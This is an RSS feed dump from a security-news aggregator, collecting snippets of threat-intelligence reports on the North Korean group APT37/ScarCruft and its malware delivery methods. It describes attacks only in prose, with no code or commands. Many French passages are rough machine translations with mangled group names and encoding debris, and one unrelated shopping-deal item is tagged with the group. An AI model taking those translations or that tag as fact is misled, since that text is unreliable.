This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-05-10T05:20:04+00:00 www.secnews.physaphae.fr ProofPoint - Cyber Firms 2024-04-16T06:00:54+00:00 https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering www.secnews.physaphae.fr/article.php?IdArticle=8483299 False Malware,Tool,Threat,Conference APT 43,APT 37 2.0000000000000000 Recorded Future - FLux Recorded Future Les pirates d'État nord-coréens visent des organisations de médias et des universitaires de haut niveau dans une nouvelle campagne d'espionnage, selon un nouveau Rapport publié cette semaine.L'objectif de ces attaques, attribué par des chercheurs de Sentinelabs à un groupe de pirates connu sous le nom de Scarcruft ou APT37, est de «recueillir des renseignements stratégiques» qui peuvent «contribuer à la prise de décision de la Corée du Nord \\

---

North Korean state hackers are targeting media organizations and high-profile academics in a new espionage campaign, according to a new report released this week. The goal of these attacks, attributed by researchers at SentinelLabs to a hacker group known as ScarCruft or APT37, is to “gather strategic intelligence” that can “contribute to North Korea\'s decision-making]]> 2024-01-24T14:00:00+00:00 https://therecord.media/scarcruft-apt37-north-korea-espionage-south-korea-media-academia www.secnews.physaphae.fr/article.php?IdArticle=8442554 False None APT 37 3.0000000000000000 Dark Reading - Informationweek Branch Based on fresh infection routines the APT is testing, it\'s looking to harvest threat intelligence in order to improve operational security and stealth.]]> 2024-01-22T20:30:00+00:00 https://www.darkreading.com/threat-intelligence/north-koreasc-arcruft-attackers-target-cybersecurity-pros www.secnews.physaphae.fr/article.php?IdArticle=8441819 False Threat APT 37 3.0000000000000000 Global Security Mag - Site de news francais mise à jour malveillant

---

A glimpse into future ScarCruft campaigns - Attackers gather strategic intelligence and target cybersecurity professionals. In collaboration with NK News, SentinelLabs has been tracking campaigns targeting experts in North Korean affairs from South Korea\'s academic sector and a news organisation focused on North Korea. SentinelLabs has observed persistent targeting of the same individuals over a span of two months. - Malware Update]]> 2024-01-22T14:45:41+00:00 https://www.globalsecuritymag.fr/a-glimpse-into-future-scarcruft-campaigns-attackers-gather-strategic.html www.secnews.physaphae.fr/article.php?IdArticle=8441691 False None APT 37 3.0000000000000000 SentinelOne (APT) - Cyber Firms New ScarCruft activity suggests the adversary is planning to target cybersecurity professionals and businesses.]]> 2024-01-22T13:55:47+00:00 https://www.sentinelone.com/labs/a-glimpse-into-future-scarcruft-campaigns-attackers-gather-strategic-intelligence-and-target-cybersecurity-professionals/ www.secnews.physaphae.fr/article.php?IdArticle=8441698 False None APT 37 3.0000000000000000 Wired Threat Level - Security News Whether you have sore muscles, tired eyes, or dull skin, there\'s a Therabody massager on sale that could help.]]> 2023-11-27T13:17:33+00:00 https://www.wired.com/story/therabody-theragun-cyber-monday-deals-2023/ www.secnews.physaphae.fr/article.php?IdArticle=8417208 False None APT 37 1.00000000000000000000 AhnLab - Korean Security Firm août 2023 Problèmes majeurs sur les groupes de l'APT 1) Andariel 2) APT29 3) APT31 4) amer 5)Bronze Starlight 6) Callisto 7) Cardinbee 8) Typhoon de charbon de bois (Redhotel) 9) Terre estrie 10) Typhon de lin 11) Groundpeony 12) Chisel infâme 13) Kimsuky 14) Lazarus 15)Moustachedbouncher 16) Éléphant mystérieux (APT-K-47) 17) Nobelium (Blizzard de minuit) 18) Red Eyes (APT37) Aug_Thereat Trend Rapport sur les groupes APT

---

August 2023 Major Issues on APT Groups 1) Andariel 2) APT29 3) APT31 4) Bitter 5) Bronze Starlight 6) Callisto 7) Carderbee 8) Charcoal Typhoon (RedHotel) 9) Earth Estries 10) Flax Typhoon 11) GroundPeony 12) Infamous Chisel 13) Kimsuky 14) Lazarus 15) MoustachedBouncher 16) Mysterious Elephant (APT-K-47) 17) Nobelium (Midnight Blizzard) 18) Red Eyes (APT37) Aug_Threat Trend Report on APT Groups ]]> 2023-10-23T02:22:16+00:00 https://asec.ahnlab.com/en/57930/ www.secnews.physaphae.fr/article.php?IdArticle=8399124 False Threat,Prediction APT 38,APT 38,APT 29,APT 37,APT 31 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The North Korea-linked Lazarus Group (aka Hidden Cobra or TEMP.Hermit) has been observed using trojanized versions of Virtual Network Computing (VNC) apps as lures to target the defense industry and nuclear engineers as part of a long-running campaign known as Operation Dream Job. "The threat actor tricks job seekers on social media into opening malicious apps for fake job interviews," Kaspersky]]> 2023-10-18T20:21:00+00:00 https://thehackernews.com/2023/10/lazarus-group-targeting-defense-experts.html www.secnews.physaphae.fr/article.php?IdArticle=8397305 False Threat APT 38,APT 38,APT 37 2.0000000000000000 AhnLab - Korean Security Firm juillet 2023 Problèmes majeurs sur les groupes APT 1) APT28 2) APT29 3) APT31 4) Camouflaged Hunter 5) Chicheur charmant 6) Gamaredon 7) Kimsuky 8) Konni 9) Lazarus 10) Mustang Panda 11) Patchwork 12) Eyes rouges 13) Pirates d'espace 14) Turla 15) ATIP_2023_JUL_JULAT RAPPORT D'APTER LE Rapport sur les APT

---

July 2023 Major Issues on APT Groups 1) APT28 2) APT29 3) APT31 4) Camouflaged Hunter 5) Charming Kitten 6) Gamaredon 7) Kimsuky 8) Konni 9) Lazarus 10) Mustang Panda 11) Patchwork 12) Red Eyes 13) Space Pirates 14) Turla 15) Unclassified ATIP_2023_Jul_Threat Trend Report on APT Groups ]]> 2023-09-11T05:02:48+00:00 https://asec.ahnlab.com/en/56971/ www.secnews.physaphae.fr/article.php?IdArticle=8381128 False Threat,Prediction APT 38,APT 35,APT 35,APT 29,APT 29,APT 37,APT 37,APT 31,APT 28,APT 28 2.0000000000000000 AhnLab - Korean Security Firm L'équipe d'analyse du centre d'intervention d'urgence (ASEC) AHNLAB a récemment découvert que le MAC MALW, qui est le CHM, qui estsupposé avoir été créé par le groupe de menaces Redeyes, est à nouveau distribué.La distribution de logiciels malveillants CHM fonctionne de la même manière que le logiciel malveillant & # 8220; CHM déguisé en e-mail de sécurité d'une société financière coréenne & # 8221; [1] couverte en mars de cette année et utilise également les mêmes commandes utilisées dans le & #.8220; 2.3.Persistance & # 8221; [2] Étape dans le processus d'attaque des redeyes ...

---

The AhnLab Security Emergency response Center (ASEC) analysis team has recently discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group, is being distributed again. The CHM malware in distribution operates in a similar way to the “CHM Malware Disguised as Security Email from a Korean Financial Company”[1] covered in March of this year and also uses the same commands used in the “2.3. Persistence”[2] stage in the attack process of the RedEyes... ]]> 2023-09-08T00:55:10+00:00 https://asec.ahnlab.com/en/56857/ www.secnews.physaphae.fr/article.php?IdArticle=8380255 False Malware,Threat APT 37 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) a confirmé que le malware [1], qui était auparavant distribué dansLe format CHM, est maintenant distribué au format LNK.Ce logiciel malveillant exécute des scripts supplémentaires situés à une URL spécifique via le processus MSHTA.Il reçoit ensuite des commandes du serveur de la menace pour effectuer des comportements malveillants supplémentaires.L'acteur de menace a distribué le fichier LNK confirmé sur un site Web ordinaire en le téléchargeant aux côtés de logiciels malveillants dans un fichier compressé.Le LNK malveillant ...

---

AhnLab Security Emergency response Center (ASEC) has confirmed that malware [1], which was previously distributed in CHM format, is now being distributed in LNK format. This malware executes additional scripts located at a specific URL through the mshta process. It then receives commands from the threat actor’s server to carry out additional malicious behaviors. The threat actor has been distributing the confirmed LNK file on a regular website by uploading it alongside malware within a compressed file. The malicious LNK... ]]> 2023-09-06T01:29:24+00:00 https://asec.ahnlab.com/en/56756/ www.secnews.physaphae.fr/article.php?IdArticle=8379404 False Malware,Threat APT 37 3.0000000000000000 AhnLab - Korean Security Firm Tendances du groupe APT & # 8211;Juin 2023 1) Andariel 2) APT28 3) Cadet Blizzard (Dev-0586) 4) Camaro Dragon 5) Chicheau charmant (Mint Sandstorm) 6) Gamaredon (Shuckworm) 7) Ke3Chang (Apt15, Nickel) 8) Kimsuky 9) Lazarus 10) Eau boueuse 11) Mustang Panda 12) Oceanlotus 13) Patchwork (éléphant blanc) 14) REd Eyes (APT37) 15) Sharp Panda 16) Sidecopy 17) Soldat Stealth ATIP_2023_JUN_THREAT Rapport de tendance sur les groupes APT

---

APT Group Trends – June 2023  1) Andariel 2) APT28 3) Cadet Blizzard (DEV-0586) 4) Camaro Dragon 5) Charming Kitten (Mint Sandstorm) 6) Gamaredon (Shuckworm) 7) Ke3chang (APT15, Nickel) 8) Kimsuky 9) Lazarus 10) Muddy Water 11) Mustang Panda 12) OceanLotus 13) Patchwork (White Elephant) 14) Red Eyes (APT37) 15) Sharp Panda 16) SideCopy 17) Stealth Soldier ATIP_2023_Jun_Threat Trend Report on APT Groups ]]> 2023-08-16T06:46:45+00:00 https://asec.ahnlab.com/en/56195/ www.secnews.physaphae.fr/article.php?IdArticle=8370575 False Threat,Prediction APT 38,APT 35,APT 35,APT 25,APT 32,APT 32,APT 37,APT 37,APT 15,APT 15,APT 28,APT 28 2.0000000000000000 AhnLab - Korean Security Firm Les cas de grands groupes APT pour le mai 2023 réunis à partir de documents rendus publics par des sociétés de sécurité et des institutions sont comme commesuit.& # 8211;Agrius & # 8211;Andariel & # 8211;APT28 & # 8211;APT29 & # 8211;APT-C-36 (Blind Eagle) & # 8211;Camaro Dragon & # 8211;CloudWizard & # 8211;Earth Longzhi (APT41) & # 8211;Goldenjackal & # 8211;Kimsuky & # 8211;Lazarus & # 8211;Lancefly & # 8211;Oilalpha & # 8211;Red Eyes (Apt37, Scarcruft) & # 8211;Sidecopy & # 8211;Sidewinder & # 8211;Tribu transparente (APT36) & # 8211;Volt Typhoon (Silhouette de bronze) ATIP_2023_MAY_TRADEAT Rapport sur les groupes APT_20230609

---

The cases of major APT groups for May 2023 gathered from materials made public by security companies and institutions are as follows. – Agrius – Andariel – APT28 – APT29 – APT-C-36 (Blind Eagle) – Camaro Dragon – CloudWizard – Earth Longzhi (APT41) – GoldenJackal – Kimsuky – Lazarus – Lancefly – OilAlpha – Red Eyes (APT37, ScarCruft) – SideCopy – SideWinder – Transparent Tribe (APT36) – Volt Typhoon (Bronze Silhouette) ATIP_2023_May_Threat Trend Report on APT Groups_20230609 ]]> 2023-07-07T02:33:29+00:00 https://asec.ahnlab.com/en/55184/ www.secnews.physaphae.fr/article.php?IdArticle=8353225 False Threat,Prediction APT 38,GoldenJackal,GoldenJackal,APT-C-36,APT 29,APT 29,APT 37,APT 37,Guam,Guam,APT 28,APT 28,APT 41,APT 36,APT 36,APT-C-17,APT-C-17 3.0000000000000000 Global Security Mag - Site de news francais Malwares]]> 2023-06-23T13:09:19+00:00 https://www.globalsecuritymag.fr/FadeStealer-un-nouveau-logiciel-malveillant-d-ecoute-du-groupe-de-pirates-nord.html www.secnews.physaphae.fr/article.php?IdArticle=8348513 False None APT 37 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The North Korean threat actor known as ScarCruft has been observed using an information-stealing malware with previous undocumented wiretapping features as well as a backdoor developed using Golang that exploits the Ably real-time messaging service. "The threat actor sent their commands through the Golang backdoor that is using the Ably service," the AhnLab Security Emergency response Center (]]> 2023-06-21T21:46:00+00:00 https://thehackernews.com/2023/06/scarcruft-hackers-exploit-ably-service.html www.secnews.physaphae.fr/article.php?IdArticle=8347758 False Malware,Threat APT 37 2.0000000000000000 Bleeping Computer - Magazine Américain The North Korean APT37 hacking group uses a new \'FadeStealer\' information-stealing malware containing a \'wiretapping\' feature, allowing the threat actor to snoop and record from victims\' microphones. [...]]]> 2023-06-21T16:16:11+00:00 https://www.bleepingcomputer.com/news/security/apt37-hackers-deploy-new-fadestealer-eavesdropping-malware/ www.secnews.physaphae.fr/article.php?IdArticle=8347834 False Malware,Threat APT 37,APT 37 2.0000000000000000 AhnLab - Korean Security Firm 1.Aperçu redeyes (également connu sous le nom d'APT37, Scarcruft et Reaper) est un groupe APT parrainé par l'État qui mène principalement des attaques contre des individus tels que les transfuges nord-coréens, les militants des droits de l'homme et les professeurs d'université.Leur tâche est connue pour surveiller la vie d'individus spécifiques.En mai 2023, Ahnlab Security Emergency Response Center (ASEC) a découvert le groupe Redeyes Distribution et à l'aide d'un infostecteur avec des fonctionnalités d'écoute qui était auparavant inconnue avec une porte dérobée développée à l'aide de Golang qui exploite le ...

---

1. Overview RedEyes (also known as APT37, ScarCruft, and Reaper) is a state-sponsored APT group that mainly carries out attacks against individuals such as North Korean defectors, human rights activists, and university professors. Their task is known to be monitoring the lives of specific individuals. In May 2023, AhnLab Security Emergency response Center (ASEC) discovered the RedEyes group distributing and using an Infostealer with wiretapping features that was previously unknown along with a backdoor developed using GoLang that exploits the... ]]> 2023-06-21T02:00:00+00:00 https://asec.ahnlab.com/en/54349/ www.secnews.physaphae.fr/article.php?IdArticle=8347574 False None APT 37 2.0000000000000000 knowbe4 - cybersecurity services CyberheistNews Vol 13 #24  |   June 13th, 2023 [The Mind\'s Bias] Pretexting Now Tops Phishing in Social Engineering Attacks The New Verizon DBIR is a treasure trove of data. As we will cover a bit below, Verizon reported that 74% of data breaches Involve the "Human Element," so people are one of the most common factors contributing to successful data breaches. Let\'s drill down a bit more in the social engineering section. They explained: "Now, who has received an email or a direct message on social media from a friend or family member who desperately needs money? Probably fewer of you. This is social engineering (pretexting specifically) and it takes more skill. "The most convincing social engineers can get into your head and convince you that someone you love is in danger. They use information they have learned about you and your loved ones to trick you into believing the message is truly from someone you know, and they use this invented scenario to play on your emotions and create a sense of urgency. The DBIR Figure 35 shows that Pretexting is now more prevalent than Phishing in Social Engineering incidents. However, when we look at confirmed breaches, Phishing is still on top." A social attack known as BEC, or business email compromise, can be quite intricate. In this type of attack, the perpetrator uses existing email communications and information to deceive the recipient into carrying out a seemingly ordinary task, like changing a vendor\'s bank account details. But what makes this attack dangerous is that the new bank account provided belongs to the attacker. As a result, any payments the recipient makes to that account will simply disappear. BEC Attacks Have Nearly Doubled It can be difficult to spot these attacks as the attackers do a lot of preparation beforehand. They may create a domain doppelganger that looks almost identical to the real one and modify the signature block to show their own number instead of the legitimate vendor. Attackers can make many subtle changes to trick their targets, especially if they are receiving many similar legitimate requests. This could be one reason why BEC attacks have nearly doubled across the DBIR entire incident dataset, as shown in Figure 36, and now make up over 50% of incidents in this category. Financially Motivated External Attackers Double Down on Social Engineering Timely detection and response is crucial when dealing with social engineering attacks, as well as most other attacks. Figure 38 shows a steady increase in the median cost of BECs since 2018, now averaging around $50,000, emphasizing the significance of quick detection. However, unlike the times we live in, this section isn\'t all doom and ]]> 2023-06-13T13:00:00+00:00 https://blog.knowbe4.com/cyberheistnews-vol-13-24-the-minds-bias-pretexting-now-tops-phishing-in-social-engineering-attacks www.secnews.physaphae.fr/article.php?IdArticle=8344804 False Spam,Malware,Vulnerability,Threat,Patching ChatGPT,ChatGPT,APT 43,APT 37,Uber 2.0000000000000000 Data Security Breach - Site de news Francais 2023-06-05T16:17:19+00:00 https://www.datasecuritybreach.fr/kimsuky-thallium-ta406/ www.secnews.physaphae.fr/article.php?IdArticle=8342214 False None APT 43,APT 37 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine The advisory identifies several actors: Kimsuky, Thallium, APT43, Velvet Chollima and Black Banshee]]> 2023-06-02T16:00:00+00:00 https://www.infosecurity-magazine.com/news/us-korean-agencies-issue-warning/ www.secnews.physaphae.fr/article.php?IdArticle=8341524 False None APT 43,APT 43,APT 37 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Cybersecurity researchers have offered a closer look at the RokRAT remote access trojan that\'s employed by the North Korean state-sponsored actor known as ScarCruft. "RokRAT is a sophisticated remote access trojan (RAT) that has been observed as a critical component within the attack chain, enabling the threat actors to gain unauthorized access, exfiltrate sensitive information, and potentially]]> 2023-06-01T12:28:00+00:00 https://thehackernews.com/2023/06/n-korean-scarcruft-hackers-exploit.html www.secnews.physaphae.fr/article.php?IdArticle=8341141 False Threat APT 37 2.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Deconstructing Amadey’s Latest Multi-Stage Attack and Malware Distribution (published: May 5, 2023) McAfee researchers have detected a multi-stage attack that starts with a trojanized wextract.exe, Windows executable used to extract files from a cabinet (CAB) file. It was used to deliver the AgentTesla, Amadey botnet, LockBit ransomware, Redline Stealer, and other malicious binaries. To avoid detection, the attackers use obfuscation and disable Windows Defender through the registry thus stopping users from turning it back on through the Defender settings. Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioral analysis defenses and social engineering training. Users should report suspicious files with double extensions such as .EXE.MUI. Indicators associated with this campaign are available in the Anomali platform and users are advised to block these on their infrastructure. MITRE ATT&CK: [MITRE ATT&CK] T1562.001: Disable or Modify Tools | [MITRE ATT&CK] T1555 - Credentials From Password Stores | [MITRE ATT&CK] T1486: Data Encrypted for Impact | [MITRE ATT&CK] T1027 - Obfuscated Files Or Information Tags: malware:Amadey, malware-type:Botnet, malware:RedLine, malware:AgentTesla, malware-type:Infostealer, malware:LockBit, malware-type:Ransomware, abused:Wextract.exe, file-type:CAB, file-type:EXE, file-type:MUI, target-program:Windows Defender, target-system:Windows Eastern Asian Android Assault – FluHorse (published: May 4, 2023) Active since May 2022, a newly-detected Android stealer dubbed FluHorse spreads mimicking popular apps or as a fake dating application. According to Check Point researchers, FluHorse was targeting East Asia (Taiwan and Vietnam) while remaining undetected for months. This stealthiness is achieved by sticking to minimal functions while also relying on a custom virtual machine that comes with the Flutter user interface software development kit. FluHorse is being distributed via emails that prompt the recipient to install the app and once installed, it asks for the user’s credit card or banking data. If a second factor authentication is needed to commit banking fraud, FluHorse tells the user to wait for 10-15 minutes while intercepting codes by installing a listener for all incoming SMS messages. Analyst Comment: FluHorse\'s ability to remain undetected for months makes it a dangerous threat. Users should avoid installing applications following download links received via email or other messaging. Verify the app authenticity on the official com]]> 2023-05-09T20:02:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-custom-virtual-environment-hides-fluhorse-babyshark-evolved-into-reconshark-fleckpe-infected-apps-add-expensive-subscriptions www.secnews.physaphae.fr/article.php?IdArticle=8334939 False Malware,Tool,Threat APT 43,APT 37 3.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) a partagé des informations concernant le groupe de menaces Redeyes (également connu sous le nom d'APT37, Scarcruft), qui a distribué CHM malware déguisé en e-mail de sécurité d'une société financière coréenne le mois dernier.Le fichier LNK contient une commande PowerShell et effectue un comportement malveillant sans la connaissance de l'individu qui utilise le fichier PDF normal en créant et en exécutant des fichiers de script ainsi que des fichiers normaux dans le chemin d'accès temporaire.Si un fichier LNK malveillant est injecté dans un ...

---

AhnLab Security Emergency response Center (ASEC) has shared information regarding the RedEyes threat group (also known as APT37, ScarCruft), who distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month. The LNK file contains a PowerShell command and performs malicious behavior without the knowledge of the individual who uses the normal pdf file by creating and executing script files along with normal files in the temp path. If a malicious LNK file is injected into a... ]]> 2023-05-07T23:30:00+00:00 https://asec.ahnlab.com/en/52172/ www.secnews.physaphae.fr/article.php?IdArticle=8334177 False Malware,Threat APT 37 2.0000000000000000 Dark Reading - Informationweek Branch APT37 is among a growing list of threat actors that have switched to Windows shortcut files after Microsoft blocked macros last year.]]> 2023-05-02T16:47:00+00:00 https://www.darkreading.com/attacks-breaches/north-korean-apt-gets-around-macro-blocking-with-lnk-switch-up www.secnews.physaphae.fr/article.php?IdArticle=8332893 False Threat APT 37 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The North Korean threat actor known as ScarCruft began experimenting with oversized LNK files as a delivery route for RokRAT malware as early as July 2022, the same month Microsoft began blocking macros across Office documents by default. "RokRAT has not changed significantly over the years, but its deployment methods have evolved, now utilizing archives containing LNK files that initiate]]> 2023-05-02T12:24:00+00:00 https://thehackernews.com/2023/05/north-koreas-scarcruft-deploys-rokrat.html www.secnews.physaphae.fr/article.php?IdArticle=8332732 False Malware,Threat APT 37 2.0000000000000000 Anomali - Firm Blog Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces Réaction en chaîne: Rokrat & rsquo; s.Lien manquant (Publié: 1er mai 2023) Depuis 2022, le groupe parrainé par le Nord-Korea APT37 (Group123, Ricochet Chollima) a principalement changé ses méthodes de livraison de Maldocs pour cacher des charges utiles à l'intérieur des fichiers LNK surdimensionnés.Vérifier les chercheurs a identifié plusieurs chaînes d'infection utilisées par le groupe de juillet 2022 à avril 2023. Celles-ci ont été utilisées pour livrer l'un des outils personnalisés de l'APT37 (Goldbackdoor et Rokrat), ou le malware de marchandises Amadey.Tous les leurres étudiés semblent cibler des personnes coréennes avec des sujets liés à la Corée du Sud. Commentaire de l'analyste: Le passage aux chaînes d'infection basées sur LNK permet à APT37 de l'interaction utilisateur moins requise car la chaîne peut être déclenchée par un simple double clic.Le groupe continue l'utilisation de Rokrat bien triés qui reste un outil furtif avec ses couches supplémentaires de cryptage, le cloud C2 et l'exécution en mémoire.Les indicateurs associés à cette campagne sont disponibles dans la plate-forme Anomali et il est conseillé aux clients de les bloquerleur infrastructure. mitre att & amp; ck: [mitre att & amp; ck] t1059.001: Powershell | [mitre att & amp; ck] t1055 - injection de processus | [mitre att & amp; ck] t1027 - fichiers ou informations obscurcis | [mitre att & amp; ck] t1105 - transfert d'outils d'entrée | [mitre att & amp; ck] t1204.002 - Exécution des utilisateurs: fichier malveillant | [mitre att & amp; ck] t1059.005 - commande et script interprète: visuel basique | [mitre att & amp; ck] t1140 - désobfuscate / décode ou informations | [mitre att & amp; ck] T1218.011 - Exécution par proxy binaire signée: Rundll32 Tags: malware: Rokrat, mitre-software-id: s0240, malware-Type: Rat, acteur: Groupe123, mitre-groupe: APT37, acteur: Ricochet Chollima, Country source: Corée du Nord, Country source: KP, Cible-Country: Corée du Sud, Cible-Country: KR, Type de fichier: Zip, déposer-Type: Doc, Fichier-Type: ISO, Fichier-Type: LNK, File-Type: Bat, File-Type: EXE, Fichier-Type: VBS, malware: Amadey,MALWARE: Goldbackdoor, Type de logiciels malveillants: porte dérobée, abusée: Pcloud, abusé: Cloud Yandex, abusé: OneDrive, abusé: & # 8203; & # 8203; Processeur de mots Hangul, abusé: themida, système cible: Windows ]]> 2023-05-01T23:16:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apt37-adopts-lnk-files-charming-kitten-uses-bellaciao-implant-dropper-vipersoftx-infostealer-unique-byte-remapping-encryption www.secnews.physaphae.fr/article.php?IdArticle=8332656 False Ransomware,Malware,Tool,Vulnerability,Threat,Prediction,Cloud APT 35,APT 37,APT 37 2.0000000000000000 Checkpoint Research - Fabricant Materiel Securite Introduction des principales conclusions des nombreux rapports sur APT37 Au cours des derniers mois, à l'annonce de Mandiant \\ sur & # 160; APT43, beaucoup d'attention est actuellement axée sur les acteurs des menaces nord-coréennes & # 8211;Et pour raison.La Corée du Nord a une longue histoire d'attaque de son voisin du sud, en particulier par la cyber-guerre qui se poursuit aujourd'hui.Dans ce [& # 8230;]

---

>Key findings Introduction From the many reports on APT37 in recent months, to Mandiant\'s announcement on APT43, a lot of attention is currently focused on North Korean threat actors – and with good reason. North Korea has a long history of attacking its southern neighbor, especially by means of cyber warfare which continues today. In this […] ]]> 2023-05-01T11:32:18+00:00 https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/ www.secnews.physaphae.fr/article.php?IdArticle=8332629 False Threat APT 43,APT 37 2.0000000000000000 Dark Reading - Informationweek Branch As threat actors around the world grow and evolve, APTs from the DPRK stand out for their spread and variety of targets.]]> 2023-04-27T19:50:44+00:00 https://www.darkreading.com/endpoint/lazarus-scarcruft-north-korean-apts-shift-tactics-thrive www.secnews.physaphae.fr/article.php?IdArticle=8331690 False Threat APT 38,APT 37 2.0000000000000000 AhnLab - Korean Security Firm Ahnlab Security Emergency Response Center (ASEC) a confirmé que le groupe de menaces Redeyes (également connu sous le nom d'APT37, Scarcruft), qui a distribué CHM malware déguisé en e-mail de sécurité d'une société financière coréenne le mois dernier, a également récemment distribué les logiciels malveillants Rokrat via des fichiers LNK.Rokrat est un logiciel malveillant capable de collecter des informations d'identification des utilisateurs et de télécharger des logiciels malveillants supplémentaires.Le malware était autrefois distribué via des fichiers HWP et Word.Les fichiers LNK qui ont été découverts cette fois contiennent des commandes PowerShell qui peuvent effectuer des malveillants ...

---

AhnLab Security Emergency response Center (ASEC) confirmed that the RedEyes threat group (also known as APT37, ScarCruft), which distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month, has also recently distributed the RokRAT malware through LNK files. RokRAT is malware that is capable of collecting user credentials and downloading additional malware. The malware was once distributed through HWP and Word files. The LNK files that were discovered this time contain PowerShell commands that can perform malicious... ]]> 2023-04-25T23:30:00+00:00 https://asec.ahnlab.com/en/51751/ www.secnews.physaphae.fr/article.php?IdArticle=8331109 False Malware,Threat APT 37 3.0000000000000000 Global Security Mag - Site de news francais rapports spéciaux / / apt 37 , affiche

---

Selbst Cyberkriminelle speichern Daten bei GitHub und vergessen ihre Daten lückenlos zu löschen. Das Zscaler ThreatLabz-Team konnte die Tools, Techniken und Prozesse (TTPs) von APT37 (auch bekannt als ScarCruft oder Temp.Reaper), einem aus Nordkorea stammenden Bedrohungsakteur von Advanced Persistent Threats, genauer unter die Lupe nehmen. - Sonderberichte / APT 37, affiche]]> 2023-04-24T07:00:00+00:00 https://www.globalsecuritymag.fr/Ein-unbeabsichtigtes-Leck-bei-Cyberkriminellen-Die-Angriffsvektoren-von-APT37.html www.secnews.physaphae.fr/article.php?IdArticle=8330708 False None APT 37 2.0000000000000000 Anomali - Firm Blog Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces campagne de phishingCible l'industrie chinoise de l'énergie nucléaire (Publié: 24 mars 2023) Actif Depuis 2013, le groupe amer (T-APT-17) est soupçonné d'être parrainé par le gouvernement indien.Des chercheurs Intezer ont découvert une nouvelle campagne amère ciblant les universitaires, le gouvernement et d'autres organisations de l'industrie de l'énergie nucléaire en Chine.Les techniques sont cohérentes avec les campagnes amères observées précédemment.L'intrusion commence par un e-mail de phishing censé provenir d'un véritable employé de l'ambassade du Kirghizistan.Les pièces jointes malveillantes observées étaient soit des fichiers HTML (CHM) compilés à Microsoft, soit des fichiers Microsoft Excel avec des exploits d'éditeur d'équation.L'objectif des charges utiles est de créer de la persistance via des tâches planifiées et de télécharger d'autres charges utiles de logiciels malveillants (les campagnes amères précédentes ont utilisé le voleur d'identification du navigateur, le voleur de fichiers, le keylogger et les plugins d'outils d'accès à distance).Les attaquants se sont appuyés sur la compression LZX et la concaténation des cordes pour l'évasion de détection. Commentaire de l'analyste: De nombreuses attaques avancées commencent par des techniques de base telles que des e-mails injustifiés avec une pièce jointe qui oblige l'utilisateur à l'ouvrir.Il est important d'enseigner l'hygiène de base en ligne à vos utilisateurs et la sensibilisation au phishing.Il est sûr de recommander de ne jamais ouvrir de fichiers CHM joints et de garder votre bureau MS Office entièrement mis à jour.Tous les indicateurs connus associés à cette campagne amère sont disponibles dans la plate-forme Anomali et il est conseillé aux clients de les bloquer sur leur infrastructure. mitre att & amp; ck: [mitre att & amp; ck] t1589.002 - rassembler l'identité des victimesInformations: Adresses e-mail | [mitre att & amp; ck] t1566.001 -Phishing: attachement de espionnage | [mitre at]]> 2023-03-28T21:28:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-account-takeover-apt-banking-trojans-china-cyberespionage-india-malspam-north-korea-phishing-skimmers-ukraine-and-vulnerabilities www.secnews.physaphae.fr/article.php?IdArticle=8322667 False Malware,Tool,Threat,Cloud APT 43,APT 37 2.0000000000000000 Dark Reading - Informationweek Branch In cyberattacks against the US, South Korea, and Japan, the group (aka APT43 or Thallium) is using advanced social engineering and cryptomining tactics that set it apart from other threat actors.]]> 2023-03-28T17:05:00+00:00 https://www.darkreading.com/threat-intelligence/north-korea-kimsuky-evolves-full-fledged-persistent-threat www.secnews.physaphae.fr/article.php?IdArticle=8322589 False Threat,Cloud APT 43,APT 37 4.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The North Korean advanced persistent threat (APT) actor dubbed ScarCruft is using weaponized Microsoft Compiled HTML Help (CHM) files to download additional malware. According to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the findings are illustrative of the group\'s continuous efforts to refine and retool its tactics to sidestep detection. "]]> 2023-03-22T17:54:00+00:00 https://thehackernews.com/2023/03/scarcrufts-evolving-arsenal-researchers.html www.secnews.physaphae.fr/article.php?IdArticle=8320487 False Malware,Threat,General Information,Cloud APT 37 2.0000000000000000 AhnLab - Korean Security Firm The ASEC (AhnLab Security Emergency response Center) analysis team has discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group (also known as APT37, ScarCruft), is being distributed to Korean users. The team has confirmed that the command used in the “2.3. Persistence” stage of the RedEyes group’s M2RAT malware attack, which was reported back in February, has the same format as the command used in this attack. This information, as well as... ]]> 2023-03-08T23:30:00+00:00 https://asec.ahnlab.com/en/49089/ www.secnews.physaphae.fr/article.php?IdArticle=8316818 False Malware,Threat,Cloud APT 37 2.0000000000000000 AhnLab - Korean Security Firm In January, the ASEC (AhnLab Security Emergency response Center) analysis team discovered that the RedEyes threat group (also known as APT37, ScarCruft) had been distributing malware by exploiting the HWP EPS (Encapsulated PostScript) vulnerability (CVE-2017-8291). This report will share the RedEyes group’s latest activity in Korea. 1. Overview The RedEyes group is known for targeting specific individuals and not corporations, stealing not only personal PC information but also the mobile phone 